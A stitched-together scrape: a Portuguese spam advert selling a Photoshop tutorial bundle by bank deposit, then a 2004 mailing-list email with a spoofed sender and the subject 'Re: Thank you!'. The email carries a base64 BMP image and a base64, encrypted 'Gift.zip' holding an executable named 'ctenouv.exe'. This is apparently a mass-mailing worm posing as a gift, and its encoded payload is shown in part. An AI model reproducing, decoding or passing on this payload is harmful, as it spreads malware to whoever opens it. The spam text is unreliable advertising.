    • 
                                  

                                  
    
                                    
  • Phototoshop
                                      em 10 Lições  
 
    • 
                                  

                                  
    
                                    
  • Apostila
                                      Completa Adobe Photoshop 6 
                                      
    • 
                                  

                                  
    
                                    
  • 
                                      
    Dicas
                                      Clássicas para Photoshop
                                       
    
                                    
  • 
                                      
    Dicas
                                      Básicas para Photoshop
    
                                    
  • 
                                      
    Correção
                                      de cores de imagens
digitalizadas
    
                                    
  • 
                                      
    Criação
                                      de cartões
postais
    
                                    
  • 
                                      
    20
                                      dicas para o Photoshop
7
    
                                    
  • 
                                      
    Como
                                      instalar os plugins
    
                                    
  • 
                                      
    Como
                                      Criar Mascaras
    
                                    
  • 
                                      
    Background
                                      vertical
    
                                    
  • 
                                      
    Trabalhando
                                      com seleções
    
                                    
  • 
                                      
    Textura
                                      em Pedra
    
                                    
  • 
                                      
    Colorização
                                      Digital de Fotos Preto e
Branco
    
                                    
  • 
                                      
    Gif
                                      Eficiente
    
                                    
  • 
                                      
    Criando
                                      uma Roda Dentada 
    
                                    
  • 
                                      
    Logotipo
                                      em Background
    
                                    
  • 
                                      
    Lightning
                                      Effect 
    
                                    
  • 
                                      
    Image
                                      Extract
    
                                    
  • 
                                      
    Efeito
                                      degradê (Fade)
    
                                    
  • 
                                      
    Efeito
                                      "Glow"
    
                                      Curves e Levels
    
                                    
  • 
                                      
    Criando
                                      Esferas
    
                                    
  • 
                                      
    Criando
                                      o Efeito Papiro
    
                                    
  • 
                                      
    Trabalhando
                                      com Coordenadas Polares
    
                                    
  • 
                                      
    Trabalhando
                                      com  3D Transform
    
                                    
  • 
                                      
    Criando
                                      Botão 3D
    
                                    
  • 
                                      
    Botão
                                      3D com Textura
    
                                    
  • 
                                      
    Botão
                                      Arredondado
    
                                    
  • 
                                      
    Botão
                                      Pressionado
    
                                    
  • 
                                      
    Botão
                                      Quadrado
    
                                    
  • 
                                      
    Cantos
                                      Arredondados
    
                                    
  • 
                                      
    Texto
                                      Arredondado
    
                                    
  • 
                                      
    Texto
                                      com Outline
    
                                    
  • 
                                      
    Texto
                                      com Sombra
    
                                    
  • 
                                      
    Texto
                                      com Textura
    
                                    
  • 
                                      
    Texto
                                      com Textura Colorida
    
                                    
  • 
                                      
    Texto
                                      Cromado
    
                                    
  • 
                                      
    Texto
                                      em 3D
    
                                    
  • 
                                      
    Texto
                                      em Metal
    
                                    
  • 
                                      
    Texto
                                      em Relevo
    
                                    
  • 
                                      
    Otimizando
                                      o Photoshop 6
    
                                    
  • 
                                      
    Criando
                                      Ferramentas com o Photoshop
7
    
                                    
  • 
                                      
    Criando
                                      Glass Ball com Photoshop
7
    
                                      
    
                                    
    • 
                                  

                                  

                                    
Todos
                                    os Tópicos acima correspondem a
                                    aproximadamente

                                     800 paginas de textos com
ilustrações.

                                    Este Conteúdo é enviado em arquivo
                                    Compactado (zipado)

                                    com 12,8 megas (incluindo os
Plugins)

                                  

                                  
 
                                  Envio feito  por  DOWNLOAD
dos
                                  arquivos

                                  
Caso
                                  seja do seu interesse, o Kit  pode
ser
                                  enviado em CD-Rom pelos Correios

                                   com acrescimo de R$ 10,00 (Midia +
                                  frete)  

                                  
 

                                  
Faça
                                  seu pedido agora apenas pelo
e-mail

                                  
photo022004@yahoo.com.br

  

                                  

                                  
Copyright
                                  2002-2003

                                  Todos Direitos Reservados

                                  

                                		
                              

                            
                          

                          
 

                        		
                      

                    
                  

                  

                		
              

            
            

              
                
LEVE AGORA O
                Tutorial Photoshop, PAGANDO APENAS:

                R$ 7,99 (ISTO MESMO)

                
            
              O
              APLITICATIVO SERÁ ENVIADO POR Download APÓS O LANCE.

                
        
                CONHEÇA NOSSAS FORMAS DE PAGAMENTO:

                

                NOSSOS
                BANCOS: Banco do Brasil,
Bradesco,
                Itau, Unibanco, HSBC

                DEPÓSITO BANCÁRIO - FORNECER
                APELIDO, DATA E AGÊNCIA DEPOSITADA

                DOC -  FORNECER APELIDO, DATA E
NÚMERO
                DO DOC

                TRANSFERÊNCIA ENTRE CONTAS - FORNECER
                APELIDO, DATA E AGÊNCIA

                

              		
            

            

              
                 
                
 

                

                  

                    
                      

                        
                          
POLÍTICA
                          ANTI-SPAM!

                          

                          

                          
MEPPS
                          – Mensagem Eletrônica de Publicidade de Produtos e
                          Serviços

                          

                          
                          
A
                          nova etiqueta da internet. Esse e-mail tem
conteúdo
                          institucional e pode ser facilmente filtrado pela
                          palavra MEPPS contida no Título ou
                          Assunto ou “Subject” do e-mail. Caso não queira
                          receber mais nenhuma mensagem publicitária desse
                          tipo, seja nossa ou de qualquer outro site, é só
                          utilizar o sistema de filtros do seu software de
                          e-mail ou avisar seu provedor que não deseja
receber
                          esta forma de divulgação. Você pode definir
de
                          antemão se quer ou não receber seu e-mail de
                          propaganda, através de filtros contidos nos
programas
                          de e-mails, tipo “Outlook”, onde você pode
                          eliminar na hora o recebimento destes e-mails,
ou pode
                          classificá-los, guardando numa pasta própria, para
                          consulta futura.

                          

                          
                          
Esta
                          mensagem não deve ser considerada “SPAM” já que
                          a mesma possui um meio de ser cancelada ou
removida a
                          qualquer momento. Se quiser mais informações
sobre SPAM,
                          inclusive “casos”, “legislação”,
                          “interesses” e “soluções” sobre o assunto,
                          visite o site: http://www.nospam.com.br

                          

                          
                          
REMOÇÃO
                          DO E-MAIL -
                          Caso NÃO queira mais receber mensagens
                          publicitárias como esta, basta você clicar no link
                          abaixo e enviar uma mensagem. A palavra REMOVER
que irá
                          aparecer automaticamente no campo Assunto deve ser
                          mantida.

                          

                          
Remover
                          Meu E-mail

                      

                    
                  

                

                
 
              

            

            
          

        		
    

  









X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DB87A8963; Fri, 19 Mar 2004 20:44:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dpi-03.com (pontenova.dpi.ufv.br [200.17.77.2])
	by master.modssl.org (Postfix) with SMTP id D29C2A8975
	for ; Fri, 19 Mar 2004 20:40:15 +0100 (CET)
Date: Fri, 19 Mar 2004 16:38:12 -0300
To: modssl-users@modssl.org
Subject: Re: Thank you!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qasqkukqwcbaaofkrgee"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qasqkukqwcbaaofkrgee
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------qasqkukqwcbaaofkrgee
Content-Type: image/bmp; name="pnofdmadle.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pnofdmadle.bmp"
Content-ID: 

Qk0mEAAAAAAAADYAAAAoAAAAeAAAABEAAAABABAAAAAAAPAPAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f2B8YHwXf/9//3//f/9//3+TfmB8
YHyTfmB8YHwXfxd/L35gfGB8L34Xfxd/L35gfGB8L34Xf/9//3//f/9//3//f/9//3//f/9/
/3//f/9/YHxgfGB8YHxgfGB8/3//f2B8YHz/f/9//3//f2B8YHxgfGB8YHxgfP9/F39gfGB8
L37/f/9//3//fy9+YHxgfBd//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//fy9+YHwXf/9//3//f/9//39gfGB8/38Xf2B8YHz/fy9+YHwXfxd/YHxgfC9+YHwXfxd/
YHxgfP9//3//f/9//3//f/9//3//f/9//3//f/9/L35gfJN+/3//f/9//3//fy9+YHwXf/9/
/3//fy9+YHyTfv9//3//f/9/L35gfJN+YHwvfv9//38vfmB8F3+TfmB8F3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f5N+YHyTfv9//3//f/9//38vfmB8k34Xfy9+
YHwXf/9//38Xf5N+YHxgfP9//38Xf5N+YHxgfP9//3//f/9//3//f/9//3//f/9//3//f/9/
/38vfmB8F3//f/9//3//fy9+YHyTfv9//3//f/9/L35gfBd//3//f/9/YHxgfP9/YHxgfP9/
/38vfmB8/3//f2B8YHz/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fxd/
YHwvfv9//3//f/9//3//f5N+L34vfmB8YHwvfv9/k35gfGB8YHyTfv9/k35gfGB8YHyTfv9/
/3//f/9//39gfGB8YHz/f/9//3//f/9//3//fy9+YHwXf/9//3//fxd/YHwvfv9//3//f/9/
/38vfmB8F3//f/9/YHxgfP9/YHxgfP9//3//f/9//3//f2B8YHz/f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fxd/YHxgfGB8YHxgfC9+F3//f/9//3//f/9/YHxgfP9/
YHxgfJN+F3//f/9/YHxgfJN+F3//f/9//3//f/9//39gfGB8YHz/f/9//3//f/9//3//f/9/
L35gfBd//3//f/9/YHxgfP9//3//f/9//3//fy9+YHwXf/9/k35gfJN+YHwvfv9//3//fxd/
F38Xf2B8YHz/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/YHxgfP9/
/38Xfy9+YHwXfy9+YHwXfxd/YHxgfP9/YHxgfP9/F39gfC9+YHxgfP9/F39gfC9+/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/F39gfC9+/3//f/9/k35gfBd//3//f/9//3//fxd/
YHwvfv9//38Xf2B8YHyTfv9//3//f2B8YHxgfGB8F3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/L35gfBd//3//fxd/YHxgfBd/L35gfGB8YHwXf/9/F38vfmB8
YHwvfhd/F38vfmB8YHwvfhd//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/k35gfGB8
/3//f/9/F39gfC9+/3//f/9//3//f5N+YHxgfP9//38vfmB8F39gfJN+/3//fy9+YHyTfv9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/L35gfJN+/3//f/9/
YHxgfP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//38vfmB8/39gfGB8/3//f/9//38vfmB8F3//f/9/L35gfP9/YHxgfP9/
/39gfGB8/39gfGB8/3//f5N+YHwvfv9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/////f////3////9/////f////3////9/////f////3////9/
////f////3////9/k35gfJN+/3///xd/YHxgfP///3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38vfmB8F39gfC9+/3//f/9/
/3//f2B8L37/f/9/L35gfBd/YHwvfv9//38vfmB8F39gfGB8/3//fxd/YHwvfv9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3////9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/F39gfGB8YHxgfGB8L34Xf/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fy9+YHxgfBd//39gfGB8YHxgfGB8YHz/f/9//38vfmB8YHwXf/9//3//fy9+
YHxgfBd/////f///YHxgfGB8YHz/f////3////9/////f////3////9/////f////3////9/
////f////3////9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3////9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3////9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3////9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3////9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3////9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------qasqkukqwcbaaofkrgee
Content-Type: application/octet-stream; name="Gift.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Gift.zip"

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
